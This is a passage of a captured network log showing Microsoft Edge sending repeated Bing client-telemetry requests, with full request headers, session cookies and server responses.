cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fc64
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628223%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fce3
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1738274628224%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.CookieGetBlocked%22%2C%22TS%22%3A1738274628224%2C%22Name%22%3A%22%22%2C%22FID%22%3A%22dsc%22%7D%2C%7B%22Text%22%3A%220%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274628238%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fcf2
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274628239%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274628239%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fd07
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-01-30T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-01-30T22:03:48.6311742+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-01-30
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5&R=3&RB=0&GB=0&RG=200&RP=0
cookie: MSPTC=ko7PnoCIDPpX2kVIxaiMwxfKlT2MPTjz_xZWo3-pdLs
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1738274628
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=250130220349
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274629.1ad0fd88
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5Dmsedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1738274628240%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130&T=1738274627000
cookie: _C_ETH=1
